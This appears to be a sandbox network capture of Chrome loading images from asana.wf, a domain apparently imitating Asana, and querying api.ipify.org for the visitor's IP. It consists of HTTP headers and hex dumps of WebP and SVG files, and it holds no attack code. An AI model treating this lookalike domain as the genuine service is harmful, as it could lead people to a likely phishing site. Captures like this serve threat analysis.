                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC253INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:57 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "740-6164f3d154651"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 1856
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC1856INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 31 35 30 22 20 68 65 69 67 68 74 3d 22 34 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 35 30 20 34 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 37 35 20 30 43 37 31 2e 30 34 34 34 20 30 20 36 37 2e 31 37 37 36 20 31 2e 31 37 32 39 38 20 36 33 2e 38 38 38 36 20 33 2e 33 37 30 36 31 43 36 30 2e 35 39 39 36 20 35 2e 35 36 38 32 34 20 35 38 2e 30 33 36 32 20 38 2e 36 39 31 38 31 20 35 36 2e 35 32 32 34 20 31 32 2e 33 34 36 33 43 35 35 2e 30 30 38 37 20 31 36 2e 30 30 30 39 20 35 34 2e 36 31 32 36 20 32 30 2e 30 32 32 32 20 35 35 2e 33 38 34 33 20 32 33 2e 39 30 31 38 43 35 36 2e 31
                                                                                                                                                                                                                    Data Ascii: <svg width="150" height="40" viewBox="0 0 150 40" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M75 0C71.0444 0 67.1776 1.17298 63.8886 3.37061C60.5996 5.56824 58.0362 8.69181 56.5224 12.3463C55.0087 16.0009 54.6126 20.0222 55.3843 23.9018C56.1


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    18192.168.2.164971994.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC582OUTGET /img/home24-ai-en.webp HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                    Referer: https://asana.wf/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC226INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:58 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "717a-6164f3d1507d1"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 29050
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC7966INData Raw: 52 49 46 46 72 71 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 10 00 00 00 b9 05 00 61 03 00 41 4c 50 48 b0 02 00 00 01 80 50 db b6 d4 e6 49 f8 12 be 14 a4 e0 a0 38 28 0e c0 01 71 40 1d 44 02 12 be 84 2f 21 f3 20 e0 75 ed 88 98 80 f8 70 98 f6 d6 2f 29 79 3f f6 79 88 ef 97 df 7e 49 ce db 56 bf 53 96 4b 8a be d5 2f fc f4 4b 92 de c6 8f 96 4b a2 be bc 57 ce 97 54 fd 28 ef 1c 97 64 fd fc c6 72 49 d7 97 17 e3 25 61 9f 9e d4 96 b1 f5 f2 b0 5d 52 f6 25 22 ea 25 69 2f 11 5b d6 36 47 b4 ac ad c7 70 49 db 87 39 6f 9b f6 bc ed ef c8 db 5a cf db fa 85 ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9 9f ff f9
                                                                                                                                                                                                                    Data Ascii: RIFFrqWEBPVP8XaALPHPI8(q@D/! up/)y?y~IVSK/KKWT(drI%a]R%"%i/[6GpI9oZ
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC8000INData Raw: 42 3a 4e d4 08 aa b6 61 29 d1 9b a5 28 ca 50 53 03 cd bc 55 3e 38 a8 49 bb 01 99 0d 95 82 20 35 ed 64 02 e1 ad 25 94 9c e3 db c6 db a2 83 b5 56 e7 2c 90 c1 93 2f 9d f7 ac 0a 8c 78 e1 61 5a 14 46 16 83 f8 96 c6 01 c9 e9 6b ed c3 66 8c 61 79 5b da e5 81 7d ec 0a ca 80 2b a4 50 bd ff b4 1b 98 79 cb 6b d3 c5 2b a4 81 56 79 58 fe e6 33 db 5c 1d 0b 26 bc 88 a6 0f 6e ab df 0e 0c 6f 3b 1b 9b 42 e1 d2 e9 3f 96 a6 de 36 4e 47 5a 37 a5 07 8f d9 10 9e e3 b6 e4 63 10 1d 26 6d f7 2b 3f 9b 9d e6 b0 2a df d7 73 74 51 b3 f8 2a 98 85 10 60 c1 77 99 a2 78 ff ba ff b7 ed fe 56 4e 49 76 fd 8e 5c 4f 69 1a 21 61 0d 3d 45 0d f7 be 73 1a c6 55 df 69 7a cc 71 17 88 76 d9 ff f0 ba 17 a5 f2 9d ae 81 c3 b1 71 4a d0 2d 56 96 9b 80 91 57 da 52 94 5f 34 e4 9d 80 b3 0e 9d a3 a8 79 ed 42
                                                                                                                                                                                                                    Data Ascii: B:Na)(PSU>8I 5d%V,/xaZFkfay[}+Pyk+VyX3\&no;B?6NGZ7c&m+?*stQ*`wxVNIv\Oi!a=EsUizqvqJ-VWR_4yB
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC8000INData Raw: a3 19 cc 06 65 ba 85 b8 e3 bd 09 c5 13 a0 37 a2 31 81 de c1 55 20 37 90 3c 62 55 f3 ee 87 98 00 5d 6f 1d 4a 86 f7 52 5c ec 52 a8 ec 6b d5 97 12 01 a5 7a 89 bf 38 23 d4 d0 92 c0 8a b1 35 e7 26 d3 30 6d 07 0a 4a c2 b0 21 29 9c db a8 b0 80 32 eb 02 61 80 d3 7a 8a 13 f3 75 42 74 3f 72 d2 15 57 8a 0d 26 d7 ad 89 38 2b 13 b2 1e 69 d5 65 ff 4f 17 a6 6f 7a d3 fa 0c fe 22 ef 10 26 30 d9 7c 18 6b 79 2c 33 e2 ef 39 ed 1f 01 91 37 b9 6d f9 6d 35 22 33 d6 d4 14 38 80 5a 9b e2 8d f1 80 56 7b 30 3d 77 be e3 31 3c a5 8e cd 5d a7 be ce 6d 41 a4 b5 a3 2e 25 30 aa 54 31 81 12 05 d7 97 d9 62 72 de 14 ed 5c a6 3c 79 8c b9 aa fa f6 8e 82 48 f5 f7 af da eb 96 15 8e c2 f9 8d 1e a4 1c 99 6e c3 1a bb 1b f5 71 0f f3 06 db 70 ff c6 4b be 71 f5 41 d4 27 32 a7 f3 c2 24 73 bd 4d 56 63
                                                                                                                                                                                                                    Data Ascii: e71U 7<bU]oJR\Rkz8#5&0mJ!)2azuBt?rW&8+ieOoz"&0|ky,397mm5"38ZV{0=w1<]mA.%0T1br\<yHnqpKqA'2$sMVc
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC5084INData Raw: 82 d2 e6 fe 97 91 50 0a b2 46 61 a3 66 39 32 09 2e d3 aa 25 4f 6c ab ff 0f 1a 36 f3 e9 e7 53 a2 54 da d3 7f d0 19 6b 2d 04 e5 76 18 db fb 60 ab 5c 14 52 de 73 c5 fc 93 d6 4e b8 53 ef cc a4 8f a6 a0 ba 9f f3 7b 50 af 27 77 26 f4 73 a1 e5 7b 40 6f 6c 99 d5 e0 ae c6 c3 76 e9 af e6 10 2b 9a 66 8e 77 15 df 90 55 35 77 f8 d6 ed 42 6b 5d 9d b6 41 5c 6a 12 ce 74 6e 74 1d ba df 79 ed ba 4d 52 0f 10 bc 16 c9 94 e3 6b 03 41 cb 4f 6a cc 3c f2 18 13 18 00 6f 48 f2 8a fb 71 f8 60 0c 0c 0b ca 98 c4 1f ec 7a 52 59 a4 cf 02 bb e1 3f d0 fe d4 01 00 c7 d8 80 00 9c 6a 93 0e c7 17 8f 1c b8 c4 a5 a6 d6 63 b8 f6 02 04 3e 9d 9a 10 bc 65 ad 3d 82 7c ad c9 51 f1 69 1e c0 d8 43 3a f7 47 43 b4 a8 0f 9a fe 63 71 61 54 d2 6e 95 7a 00 ba 16 ef f8 1c e5 b2 eb 82 ef ae 10 35 9d 3e 0d 92
                                                                                                                                                                                                                    Data Ascii: PFaf92.%Ol6STk-v`\RsNS{P'w&s{@olv+fwU5wBk]A\jtntyMRkAOj<oHq`zRY?jc>e=|QiC:GCcqaTnz5>


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    19192.168.2.164972294.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC368OUTGET /img/logo-ratio-40pxheight-merck.webp HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC224INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:58 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "7dc-6164f3d154651"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 2012
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC2012INData Raw: 52 49 46 46 d4 07 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 10 00 00 00 2b 01 00 4f 00 00 41 4c 50 48 b8 06 00 00 01 a0 87 ff 9f d9 39 fa ac eb 4d ed 36 d5 19 b5 31 67 db ae 7d 56 dd 9c 6d db 66 ed 66 cf 36 b7 4a ad 45 6a 77 bf 7f fc be 33 99 99 a4 f7 e4 f4 3c 11 31 01 f8 9f e8 36 a7 0c bd e5 8e 71 e7 88 82 f4 a3 cb 6d 8b 48 ba 6d de 45 05 a9 46 77 9f 22 06 23 b2 53 8b 2a 37 6f a7 e8 c5 ad 53 8a 7a 1f 91 d6 0d 03 52 89 66 8b 48 f7 d5 29 44 ad 62 d2 7f 51 fa f0 3c 19 0c db a6 0d 03 c8 e8 47 79 e9 82 13 98 a1 ab d2 85 a1 64 78 4d 95 54 61 91 29 3a 31 4d 10 64 7c 52 9a 30 c1 5c 58 29 45 f0 cd d1 e1 29 c2 2f 16 9c 93 22 ec b6 60 78 4a 90 d5 aa d7 d1 be 85 a3 44 cf 4a c6 1c a1 e8 46 e9 20 e4 5d 01 38 42 67 5b 00 1d 45 c4 1e 79 ba f2 db 0f 7d 66 a6 ef fb 33 6e
                                                                                                                                                                                                                    Data Ascii: RIFFWEBPVP8X+OALPH9M61g}Vmff6JEjw3<16qmHmEFw"#S*7oSzRfH)DbQ<GydxMTa):1Md|R0\X)E)/"`xJDJF ]8Bg[Ey}f3n


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    20192.168.2.164972194.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC585OUTGET /img/home24-security.webp HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                    Referer: https://asana.wf/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC226INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:58 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "2f88-6164f3d1507d1"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 12168
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC7966INData Raw: 52 49 46 46 80 2f 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 10 00 00 00 df 04 00 63 01 00 41 4c 50 48 6b 02 00 00 01 90 15 d9 b6 dd 46 27 0c 6e 18 08 82 c3 40 48 62 31 88 19 38 48 2c 23 b0 06 81 2e 82 91 19 d8 0c 62 06 e7 ce fb 79 3e f6 ad f3 b1 22 c2 8d db 46 92 44 63 a2 09 5b 7b ef 0b ec 97 2b d3 7c bd 37 39 f7 a8 f3 7e b0 80 eb c8 5e 84 ae 65 ac 4d d8 2d 63 0c fd d9 8b d6 b5 ec 6a 13 77 75 88 21 4f 7a 59 87 df 7a 6b 02 ef 18 44 9a f4 e2 bf a9 a5 cc 4d e2 2d 25 c6 17 47 79 d2 cb e5 57 b5 94 6b 13 79 d7 28 0f d0 34 e9 65 2b 3f 5b 9a cc 9b a3 48 93 5e 4e 3f 39 36 a1 77 08 22 4d 7a f1 c3 0f 86 26 f5 76 41 a4 49 2f be fb ae 6a ad 46 91 26 bd ac 66 36 36 b1 37 06 91 26 bd f8 68 b6 b4 d6 65 6f 40 d2 a4 97 d5 86 26 f7 a2 fc c7 21 4d 7a f1 32 e9 6d 8a 22 4b 7a
                                                                                                                                                                                                                    Data Ascii: RIFF/WEBPVP8XcALPHkF'n@Hb18H,#.by>"FDc[{+|79~^eM-cjwu!OzYzkDM-%GyWky(4e+?[H^N?96w"Mz&vAI/jF&f667&heo@&!Mz2m"Kz
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC4202INData Raw: 8c e5 01 48 4c 6d 0c 44 82 c8 18 a9 2b 0f 42 89 8b 4e c1 ab 78 be cb 48 73 5f 19 b7 03 29 ff 28 e0 11 88 02 91 32 36 f8 34 dd a5 cc 00 58 c3 3a 1f 79 49 e2 9e 52 5b 31 e9 4f 00 de e9 b7 b8 a5 d5 0c 62 ed 72 49 7c 65 87 98 7a 1a 0c 69 53 af ad 06 ed e7 57 23 46 90 6c 40 fe 03 23 ca 1a 9b dc 3f 83 65 b6 80 c6 6d b1 d9 8d d6 bc 99 d9 d4 91 53 4b ee 44 2c d1 ce cb 68 41 ea d1 ed 07 5e 84 81 7b d8 67 0b ef f7 7e be 8e c7 e8 c1 95 67 9c f8 0f 9e 2d 73 64 25 49 fb b9 73 43 d8 5c 2c b5 d1 60 41 7c d5 30 13 46 1c 0b b6 cb 7b c1 03 27 27 24 a5 e6 11 99 b5 35 6a 35 79 e3 39 08 50 43 99 73 04 27 6e 9b 15 e4 9b b5 c5 ac 02 df 78 9f 76 42 e2 8b 57 b2 83 27 da 81 ce 29 66 f9 f9 45 7e 3d 0e 82 61 0f dc 54 8c d6 a8 9b 4d 63 fc 57 22 49 75 b1 d4 95 fb bb 6c 10 f5 a9 7e 35
                                                                                                                                                                                                                    Data Ascii: HLmD+BNxHs_)(264X:yIR[1ObrI|eziSW#Fl@#?emSKD,hA^{g~g-sd%IsC\,`A|0F{''$5j5y9PCs'nxvBW')fE~=aTMcW"Iul~5


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    21192.168.2.1649723104.26.12.2054432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC539OUTGET /?format=json HTTP/1.1
                                                                                                                                                                                                                    Host: api.ipify.org
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Origin: https://asana.wf
                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://asana.wf/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC249INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:58 GMT
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Content-Length: 23
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                    CF-RAY: 87a0e3511c1a6733-ATL
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC23INData Raw: 7b 22 69 70 22 3a 22 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 22 7d
                                                                                                                                                                                                                    Data Ascii: {"ip":"185.152.66.230"}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    22192.168.2.164972494.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC599OUTGET /img/card-overstock-asana-customer.webp HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                    Referer: https://asana.wf/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC226INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:58 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "3b22-6164f3d14f831"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 15138
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC7966INData Raw: 52 49 46 46 1a 3b 00 00 57 45 42 50 56 50 38 20 0e 3b 00 00 70 59 01 9d 01 2a 30 02 75 01 3e 91 40 9c 4b a5 a3 22 af 21 f0 fb 61 e0 12 09 67 6e 89 37 17 75 7c 4a fd 7c bf 77 d3 fa f2 62 c7 a8 2a 6b 3e 59 ae af b2 ad d0 75 9e 41 57 95 ef 9f 76 27 f9 ef 5d 96 1b fe 0b c1 8e cb fd bb fe bb c4 8f fe bd fb 83 05 96 d7 d2 34 3c 67 1f f7 df 50 af e5 5f e9 bd 62 3c 27 fe c1 ea 31 fb 0b d6 7b f7 63 d8 a3 f6 a8 10 2d 96 1b 52 3c d9 cb 54 72 57 ea d2 5b 27 b2 47 3b ea b7 19 c6 c8 9d 65 22 91 0d aa e2 16 45 a4 17 77 ea cd fc 32 2a 0e 22 ab 7c 55 e3 0d 00 c5 13 9b e5 1e dd 1e 2b 57 e0 8b c0 4e ec cf 7f 70 4a 87 ef 2e 8d c0 ed 52 db 42 de e6 ca c9 9d 69 86 b3 59 e8 8a 3b 32 88 6c 24 f2 d8 57 91 90 b4 61 75 cc 46 b2 bd 3e d5 c9 82 53 63 d0 da 5c 73 4f 2d e9 ec d1 f5 fd
                                                                                                                                                                                                                    Data Ascii: RIFF;WEBPVP8 ;pY*0u>@K"!agn7u|J|wb*k>YuAWv']4<gP_b<'1{c-R<TrW['G;e"Ew2*"|U+WNpJ.RBiY;2l$WauF>Sc\sO-
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC7172INData Raw: a3 f4 52 9d 88 06 e6 5c 30 95 74 17 2d 2c 51 a2 71 03 bb f9 21 fc 4c ab 4a dc db 95 f3 a5 34 83 70 30 cf e4 f9 9a e9 81 66 dc d3 e0 28 46 9d cb ca 9e 4c 80 27 1b cc 32 2f e2 b7 73 29 06 6e e4 50 97 65 47 fa e3 05 ba 2d 04 06 88 17 e4 60 8a 4c d0 49 86 a0 1f 86 0b 6d fd 12 88 7a b6 13 35 ba b6 f5 65 dd b9 53 9a 76 e4 5e 6a 0d a0 f0 d3 5b fc 8e b7 56 fa 28 26 bc 21 8e 0c 28 8c d0 87 c7 a8 c7 7a 60 76 3c c2 26 ed ce 92 e9 22 76 e7 ad f0 da 71 7a 8a 9e 59 05 c5 d5 ea a9 dc 4d a3 c2 5a d5 8f 87 55 cd 57 1b 7a 9b 4d ad 50 e6 5a 8e 18 f6 84 3c c6 c5 3b 30 c7 60 e9 31 f5 6e cd 1c 64 e2 dd 6e 5f c4 47 93 3e d4 23 bc a5 de 60 ae 23 4a 96 d2 8e d9 b2 a4 69 96 7d 00 da dd 43 22 ce ab 34 17 63 ca 02 c7 5a ec ac 51 a9 3b 5f 8b 03 9f ed 2c 56 ba e3 07 92 9f 11 c2 21 97
                                                                                                                                                                                                                    Data Ascii: R\0t-,Qq!LJ4p0f(FL'2/s)nPeG-`LImz5eSv^j[V(&!(z`v<&"vqzYMZUWzMPZ<;0`1ndn_G>#`#Ji}C"4cZQ;_,V!


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    23192.168.2.164972594.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC582OUTGET /img/card-hubspot.webp HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                    Referer: https://asana.wf/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC226INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:58 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "40a4-6164f3d14f831"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 16548
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC7966INData Raw: 52 49 46 46 9c 40 00 00 57 45 42 50 56 50 38 20 90 40 00 00 70 37 01 9d 01 2a 30 02 75 01 3e 91 40 9c 4b a5 a3 26 2c a3 10 3b 41 90 12 09 67 6e 8e ff 33 e8 4e 77 37 70 03 4f 03 af 7c 49 08 22 9c 00 8f 2a 18 ab a7 de 05 1a 00 fa d6 d3 d2 67 cc 3f 9f ff 7d fb 15 e6 cf e7 fd 75 38 5b f8 2f 06 fb 3b f6 73 f3 eb 50 87 b7 da 41 85 fe 14 ff 4b e8 5b 88 b3 f2 de a1 bf a7 fd 64 bf e9 f2 af fb 1f a8 5f 97 77 b3 cf df 1f 66 af db 02 1c 41 f1 ff 4f 5f 59 34 95 e6 22 33 49 ec c1 1d 94 0e bf 32 93 d5 5d c6 f2 9d f3 f2 38 c1 f9 d8 78 0a 41 4b 5e 01 f5 c7 89 0e 89 fe 97 25 aa 5b c7 91 db 94 f9 e8 7f fc 8a 05 be ec fb cc 5f fc 46 9d 99 58 c7 76 ab ff ab 36 1b b0 6e 4e 50 bd af 2e d1 df d2 b5 65 1e b9 9f e4 44 5f 55 a9 ea e5 df b8 64 69 fa 93 ee 6a 7f fc 42 96 4b 34 20 b4
                                                                                                                                                                                                                    Data Ascii: RIFF@WEBPVP8 @p7*0u>@K&,;Agn3Nw7pO|I"*g?}u8[/;sPAK[d_wfAO_Y4"3I2]8xAK^%[_FXv6nNP.eD_UdijBK4
